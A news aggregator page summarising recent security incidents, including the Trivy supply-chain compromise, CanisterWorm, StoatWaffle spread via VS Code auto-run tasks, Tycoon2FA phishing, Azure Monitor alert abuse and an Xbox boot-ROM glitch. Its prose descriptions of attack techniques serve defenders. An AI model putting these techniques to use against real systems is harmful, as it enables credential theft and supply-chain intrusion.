All news in category “Incidents and Data Breaches”

🔒 Crunchyroll is investigating claims that attackers stole personal data for roughly 6.8 million users after compromising a support agent's Okta SSO credentials. The actor says they accessed multiple applications — including Zendesk, Slack and Google Workspace — and downloaded about 8 million support tickets containing names, emails, IPs, locations and ticket contents. Intrusive payment details were reportedly present only when customers shared them in tickets. The attacker demanded $5 million in extortion but, according to the actor, received no response.

🛡️ The North Korean-linked group Contagious Interview (aka WaterPlum) is abusing Visual Studio Code auto-run tasks to distribute a Node.js-based malware family called StoatWaffle. Malicious projects use tasks.json with runOn: folderOpen to automatically fetch and install Node.js, then execute a downloader that chains to next-stage modules. StoatWaffle includes a browser credential stealer and a RAT capable of file operations, command execution, and data exfiltration.

🔔 The TeamPCP threat actor extended its Trivy supply‑chain attack by pushing malicious Docker images and hijacking Aqua Security's GitHub organization, tampering with multiple repositories. Security researchers and Socket identified Docker Hub images tagged 0.69.5 and 0.69.6 that lack corresponding GitHub releases and contain indicators of compromise linked to the TeamPCP Cloud stealer. Aqua said incomplete token rotation after an earlier incident allowed attackers to reuse credentials, and the company published safe Trivy releases while engaging Sygnia to investigate and remediate.

🛡️ Tycoon2FA, a subscription-based phishing-as-a-service platform, has resumed operations following a coordinated takedown that seized 330 domains. The service uses adversary-in-the-middle techniques to intercept live authentication sessions and bypass multifactor authentication, and it continues to deploy AI-generated decoy pages and malicious URLs. CrowdStrike reported multiple suspected Tycoon2FA-enabled incidents in early March. Organisations are urged to prioritise continuous detection, real-time signal correlation, and layered defences to counter this adaptive threat.

🛡️Microsoft Defender's predictive shielding disrupted a GPO-based ransomware campaign targeting a large educational institution with more than a couple thousand devices. The attacker created malicious GPOs to disable protections and deploy scheduled tasks via the SYSVOL share; Defender detected policy tampering and applied GPO hardening, temporarily pausing policy propagation. Roughly 700 devices were hardened within hours, preventing any encryption via the GPO path and contributing to an overall ~97% protection rate. Combined with attack disruption that blocked compromised accounts and lateral movement, the intervention contained the incident and limited impact from concurrent SMB-based ransomware activity.

🚨 A financially motivated group known as TeamPCP deployed a self‑propagating worm called CanisterWorm that spreads through poorly secured cloud control planes and conditionally executes a destructive wiper on systems set to Iran’s timezone or Farsi locale. The actors leveraged exposed Docker APIs, misconfigured Kubernetes clusters, Redis servers and the React2Shell vector, and inserted credential‑stealing code into official Trivy releases via compromised GitHub Actions. Researchers observed the group using ICP canisters to host payloads and noted the malicious builds were active only intermittently, leaving uncertainty about the extent of successful data destruction.

🛡️ Researchers have identified additional compromised Docker images tied to the Trivy supply‑chain incident after attackers injected credential‑stealing malware into official releases and GitHub Actions. New Docker tags 0.69.5 and 0.69.6 were uploaded on March 22 without matching GitHub releases and contain IOCs linked to the TeamPCP infostealer. Aqua Security confirmed repository tampering and advised teams to treat CI/CD scans as potentially compromised while noting its commercial products appear unaffected.

🔓 A researcher developed a hardware voltage-glitching exploit, dubbed Bliss, that targets the Xbox One boot ROM to bypass early ARM Cortex memory protections. By inducing two precisely timed voltage collapses, the attacker can skip critical setup and redirect execution into attacker-controlled data. The exploit is a silicon-level, unpatchable compromise that enables loading unsigned code and accessing the console’s security processor.

⚠️Microsoft reported large-scale IRS-themed phishing campaigns in February 2026 that targeted more than 29,000 users across 10,000 organizations, using tax refund, payroll and W‑2 lures to harvest credentials and deliver remote access tools. Attackers leveraged Phishing-as-a-Service kits (notably Energy365 and SneakyLog/Kratos) and abused legitimate RMM products such as ScreenConnect, Datto, and SimpleHelp to maintain persistent access. Microsoft advises enforcing 2FA, applying conditional access, and blocking malicious domains and payloads to reduce exposure.

🔐 The FBI warns that Iranian-linked actors, including Handala and a state-associated Homeland Justice group, are using Telegram as command-and-control infrastructure in Windows malware campaigns. Attackers employ social engineering to install malware that exfiltrates screenshots and files from journalists, dissidents, and opposition groups worldwide. The alert followed the seizure of four clearnet domains and references prior disruptive operations such as Handala's attack on Stryker.

🔎 Behavioral analytics and threat intelligence combined to identify a suspected North Korea-linked fake IT worker within 10 days of hire. LevelBlue SpiderLabs and Cybereason XDR flagged geolocation anomalies, unmanaged device access, and use of Astrill VPN, triggering a high-severity alert and timely account revocation. Organizations should enforce EntraID Conditional Access, manage endpoints, and maintain software baselines to detect such insider threats.

🛡️ A Europol-backed, German-led operation has dismantled over 373,000 .onion sites tied to a fraudulent platform called Alice with Violence CP that advertised child sexual abuse material (CSAM) and cybercrime-as-a-service. The multi-year investigation, concentrated between 9–19 March, turned thousands of decoy domains into an honeypot that helped identify 440 customers. Authorities have issued an international arrest warrant for an alleged Chinese operator and continue probes into more than 100 suspects.

🚨 Researchers uncovered trojanized Trivy images on Docker Hub after a supply-chain compromise that pushed malicious releases to developer environments. The last known clean release is 0.69.3; tags 0.69.4–0.69.6 were removed after analysis linked several images to the TeamPCP infostealer. The incident also affected related GitHub Actions and spawned downstream npm compromises and repository defacements.

🛡️ The Trivy vulnerability scanner was compromised in a supply-chain attack that injected an infostealer into official releases and GitHub Actions. Researchers attribute the campaign to TeamPCP, which trojanized the trivy binary (v0.69.4) and replaced GitHub Action entrypoints, affecting many trivy-action tags. The malware harvested a broad range of credentials, exfiltrated data to a typosquatted C2, and deployed persistence on infected hosts. Organizations using affected versions should assume full compromise and rotate secrets immediately.

⚠️ Microsoft Azure Monitor alerts are being abused to distribute callback phishing messages that impersonate billing and security notices. Attackers create alert rules with custom descriptions and configure them to send emails to lists they control, causing legitimate azure-noreply@microsoft.com messages to reach targets and pass SPF/DKIM/DMARC checks. Recipients are urged to call listed numbers, a tactic that can lead to credential theft, payment fraud, or remote access compromise.

🔒 U.S. agencies warn that threat actors aligned with Russian intelligence are conducting targeted social-engineering phishing campaigns to compromise commercial messaging apps such as Signal and WhatsApp. The attacks have led to unauthorized access to thousands of accounts and involve impersonation of support personnel to request SMS codes, verification PINs, or to deliver malicious QR links. Victims who provide codes can lose account control, while those who scan attacker-controlled QR codes may have past and future messages exposed. Authorities advise never sharing verification codes and regularly reviewing linked devices in app settings.

🛡️ The actors behind the Trivy supply-chain compromise are now suspected of seeding a self-propagating worm called CanisterWorm, which uses an ICP canister (Internet Computer blockchain smart contract) as a decentralized dead drop for command-and-control. The chain abuses an npm postinstall hook to drop a Python backdoor and establishes persistence via a masquerading systemd user service that restarts automatically. A new variant harvests local npm tokens during postinstall and launches an automated propagation routine, turning compromised developers and CI pipelines into unwitting distributors.

⚠ The widely used Trivy vulnerability scanner and its official GitHub Actions were backdoored after attackers injected a credential‑stealing payload into official releases, the trivy-action and setup-trivy components, and published binaries. The malware harvests pipeline secrets by reading process memory and searching filesystems for SSH keys, cloud credentials, Kubernetes tokens, Docker configs, and wallets, exfiltrating encrypted data to a typosquatted domain or, failing that, by creating a public repository named tpcp-docs. Researchers say the intrusion followed an earlier compromise and incomplete credential rotation that let attackers regain access via insecure GitHub Actions; victims should rotate secrets immediately and pin Actions to full commit SHAs. Known safe versions include Trivy v0.69.3, trivy-action tag 0.35.0, and setup-trivy 0.2.6.

🔔 The FBI has publicly attributed widespread phishing campaigns against encrypted messaging apps—primarily Signal and, to a lesser extent, WhatsApp—to actors linked to Russian intelligence services. The adversaries do not break end-to-end encryption; they hijack accounts via social engineering, commonly tricking victims into sharing verification codes or scanning malicious QR codes. Thousands of accounts worldwide have reportedly been compromised, often targeting individuals with sensitive access. Authorities urge users to refuse unsolicited device-linking requests and never share verification codes.

🔒 The Trivy open-source scanner and its GitHub Actions integrations (aquasecurity/trivy-action and aquasecurity/setup-trivy) were compromised in March 2026 when an attacker force-pushed 75 version tags to point to malicious commits. The injected Python infostealer harvests CI/CD secrets from runners, attempts exfiltration to an attacker-controlled domain, and can stage stolen data using captured PATs if network exfiltration fails. Vendors advise immediate secret rotation, blocking the malicious domain/IP, and pinning Actions to full commit SHAs.